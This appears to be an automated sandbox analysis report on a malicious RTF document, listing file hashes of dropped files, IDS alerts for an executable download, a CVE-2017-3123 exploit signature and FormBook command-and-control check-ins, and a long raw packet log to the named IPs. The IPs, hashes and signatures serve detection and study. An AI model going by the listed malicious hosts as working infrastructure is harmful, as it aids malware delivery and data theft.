                                                                                                                                                                                  Entropy (8bit):7.943111027493155
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:INaDPw1Qk89Tmya4B/wP1mlYz5zdTpndwFPVw5XZdZi0pZvSrP7+2xO:IULw9gTFygYjdeFPVw5XFi6Zvv2xO
                                                                                                                                                                                  MD5:6A39668F48A502DBFA3CC13C7F463281
                                                                                                                                                                                  SHA1:00D040A6A3125FA7D929BF7930BC3088D9761B91
                                                                                                                                                                                  SHA-256:1331A8B126688B8C66B1B6A349502D7E7814B4F765C752440C756C90F0E9AE07
                                                                                                                                                                                  SHA-512:8514CF235A04E4ACDB71E3C0FC89702B60A62413ED25AE4695B8AA17A373E6C45D5EB7E193523E4B47406001ADEB92D165AB3C1C69B424A057C69C535E0F7894
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.!g..............0.................. ... ....@.. .......................`............@.....................................O.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@..@.reloc.......@......................@..B........................H........q...g...............D...........................................0...........(......(.....+..*...0...........(.......(.....+..*..0...........(........(.....+..*.0...........(.........(.....+..*....0...........(...........(.....+..*..0...........(.............(.....+..*....0.................(.......(.....+..*....0.................(........(.....+..*...0.................(.........(.....+..*..0.................(...........( ....+..*....0.................(.............(!.

                                                                                                                                                                                  C:\Users\user\Desktop\~$na.doc

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                  Entropy (8bit):2.5038355507075254
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:vrJlaCkWtVyhGlvAhuWhlkf9ln:vdsCkWtl6hnlOl
                                                                                                                                                                                  MD5:804390E644FA0474477DF3E9CF0D414F
                                                                                                                                                                                  SHA1:DD3A35414FDE3DA61F605290145BBF4C16C3F3F7
                                                                                                                                                                                  SHA-256:8B776BAF7BB823DACC0EC849005404DC9485B8B628B47EAF9017DE8CDB8650D3
                                                                                                                                                                                  SHA-512:35915649801D7E8BCD5F5571DBF9209BB6E2FE370C518529C8FDA60ED9EA1E253FF0C1F1C197ADD2429A8FDB3B9A5A06C7B2EFEA14B613964720AD9CD057FF25
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (65276), with CR line terminators
                                                                                                                                                                                  Entropy (8bit):3.8695817496843667
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Rich Text Format (4004/1) 100.00%
                                                                                                                                                                                  File name:na.doc
                                                                                                                                                                                  File size:1'189'943 bytes
                                                                                                                                                                                  MD5:1e6c06ed300dd4d6744f43efd6cc36a2
                                                                                                                                                                                  SHA1:8aaece78eaab5c434c8b9a88a1b154a09f800d16
                                                                                                                                                                                  SHA256:dbde17546d423c444465c7f4bbecd593e99c4d43136269bb7f1f3be544d716eb
                                                                                                                                                                                  SHA512:f6b6d4c2e51b250f1b0cc6ba68fe5d64aef88108d1273f23fbc0ec88de3802af1bba7bde66f5066c25ec0a3104148c9582032a65369747d3c0d767e070066a0c
                                                                                                                                                                                  SSDEEP:6144:hwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAP:RD3
                                                                                                                                                                                  TLSH:CE45072DD34B02598F620377AB571E5142BDBA7EF38552B1302C537933EAC39A1252BE
                                                                                                                                                                                  File Content Preview:{\rt..{\*\Q0CyzYzYbskJZdq7zz7bsZwgIhfNvrDvtK17fB9qPVhtUqN8ApUjjG2ofE4DEYNc9YOtivFb01GtPFWYOmnJUXgVcKynYPJIi55xAgX1vpDyOmYWBFp0AGBvdQBlvLH67Ksw4NJEhJLlRLmC6dLSnNoDHuRnPFZCuhYWSsqOquRwapSleL8KQlqX4CYW02TkcbuLL8RfuzG9t8sLNmzH4LY3YhHdkcFukQh5l0LDQ0b3MCK6nLfxl

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:2764a3aaaeb7bdbf

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                  2024-10-30T08:37:29.702583+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1187.120.84.3880192.168.2.2249163TCP
                                                                                                                                                                                  2024-10-30T08:37:30.054009+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2187.120.84.3880192.168.2.2249163TCP
                                                                                                                                                                                  2024-10-30T08:37:30.054009+01002827449ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123)187.120.84.3880192.168.2.2249163TCP
                                                                                                                                                                                  2024-10-30T08:38:51.849816+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.224916413.248.213.4580TCP
                                                                                                                                                                                  2024-10-30T08:38:51.849816+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.224916413.248.213.4580TCP
                                                                                                                                                                                  2024-10-30T08:38:51.849816+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.224916413.248.213.4580TCP
                                                                                                                                                                                  2024-10-30T08:40:34.568080+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.224916568.66.226.11780TCP
                                                                                                                                                                                  2024-10-30T08:40:34.568080+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.224916568.66.226.11780TCP
                                                                                                                                                                                  2024-10-30T08:40:34.568080+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.224916568.66.226.11780TCP

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Oct 30, 2024 08:37:28.749958992 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:28.755569935 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:28.755639076 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:28.755836010 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:28.761185884 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702449083 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702516079 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702523947 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702528954 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702539921 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702550888 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702560902 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702572107 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702583075 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702594995 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702604055 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702605009 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702617884 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702621937 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702642918 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.702666998 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.707943916 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.708095074 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.708147049 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.708187103 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.708244085 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.708271027 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.708307981 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.878179073 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.878196955 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.878209114 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.878218889 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.878390074 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.878390074 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.885559082 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.885575056 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.885586023 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.885596991 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.885643005 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.885643959 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.891582966 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.891602993 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.891613007 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.891624928 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.891634941 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.891650915 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.891858101 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.891858101 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.896888018 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.896900892 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.896909952 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.896922112 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.896931887 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.896961927 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.896961927 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.902196884 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.902209044 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.902218103 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.902228117 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.902268887 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.902268887 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.907473087 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.907485962 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.907496929 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:29.907548904 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:29.907548904 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054008961 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054135084 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054189920 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054223061 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054245949 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054275036 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054277897 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054327965 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054330111 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054363966 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054382086 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054399014 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054414034 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054452896 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054567099 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054600954 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054621935 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054636955 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054666042 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054671049 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054686069 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.054724932 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.055425882 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.055491924 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.055510998 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.055530071 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.055552959 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.055566072 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.055573940 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.055605888 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.055619001 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.055663109 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056118965 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056178093 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056186914 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056215048 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056232929 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056262016 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056266069 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056303024 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056313038 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.056359053 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057018042 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057070017 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057087898 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057106972 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057131052 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057140112 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057148933 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057177067 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057205915 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057226896 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057908058 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057960033 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057976007 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.057996988 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058017015 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058031082 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058047056 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058068037 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058085918 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058124065 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058840990 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058893919 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058912992 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058929920 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058954954 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058963060 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058975935 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.058999062 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059014082 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059051991 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059700966 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059740067 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059771061 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059793949 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059798002 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059833050 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059851885 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059868097 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059890032 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.059927940 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060651064 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060712099 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060715914 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060751915 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060767889 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060786009 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060800076 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060822010 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060841084 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060877085 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061609030 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061690092 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061733961 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061769009 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061789989 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061815023 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061819077 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061863899 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230618954 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230700016 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230736017 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230786085 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230854034 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230887890 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230890989 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230890989 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230890989 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230890989 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230921984 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230954885 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230981112 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230981112 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230981112 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230989933 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231010914 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231024981 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231057882 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231066942 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231090069 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231108904 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231126070 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231159925 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231178045 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231193066 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231220961 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231228113 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231246948 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231261015 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231280088 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231328964 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231334925 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231364965 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231379032 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231401920 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231404066 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231424093 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231437922 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231451988 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231472015 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231484890 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231520891 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231522083 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231560946 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231575966 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231611013 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231614113 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231645107 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231664896 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231679916 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231704950 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231726885 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231731892 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231765032 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231765032 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231786013 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231800079 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231821060 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231834888 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231846094 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231888056 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231915951 CET804916387.120.84.38192.168.2.22
